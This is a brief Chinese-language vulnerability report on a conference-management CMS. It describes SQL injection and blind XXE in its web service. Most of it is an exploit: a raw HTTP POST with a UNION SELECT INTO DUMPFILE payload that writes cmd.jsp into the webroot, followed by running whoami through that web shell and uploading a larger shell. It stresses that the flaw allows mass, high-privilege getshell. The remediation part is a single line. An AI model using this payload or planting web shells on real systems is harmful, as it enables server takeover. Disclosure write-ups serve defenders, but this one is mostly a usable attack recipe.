sql注入
存在sql注入。
XXE漏洞
webservice服务存在blind xxe,访问http://**.**.**.**/Conf/services/ConferenceWebService?wsdl
有个名为xml的参数,可以提交xxe payload测试(payload需要实体编码)
getshell
会议系统为集成安装环境,windows服务器, apache+mysql4+tomcat,利用sql注入就能写shell了。
构造Payload1
2
3
4
5
6
7
8
9
10
11
12POST /Conf/jsp/systembulletin/bulletinAction.do?operator=details HTTP/1.1
Host: **.**.**.**
Proxy-Connection: keep-alive
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.101 Safari/537.36
Accept-Encoding: gzip, deflate, sdch
Accept-Language: zh-CN,zh;q=0.8
Content-Length: 995
Content-Type: application/x-www-form-urlencoded
sysId=-1%20union%20select%200xinto dumpfile '../../management/webapps/root/cmd.jsp'%23
成功创建cmd.jsp文件。
访问http://**.**.**.**/cmd.jsp?cmd=whoami
执行cmd命令成功。
修改上传内容,上传大马。
总结
这个cms漏洞可以实现批量getshell,而且是高权限,缺点是只要在Windows环境下搭建。
修复方案:
参数过滤
修复xxe
参考文章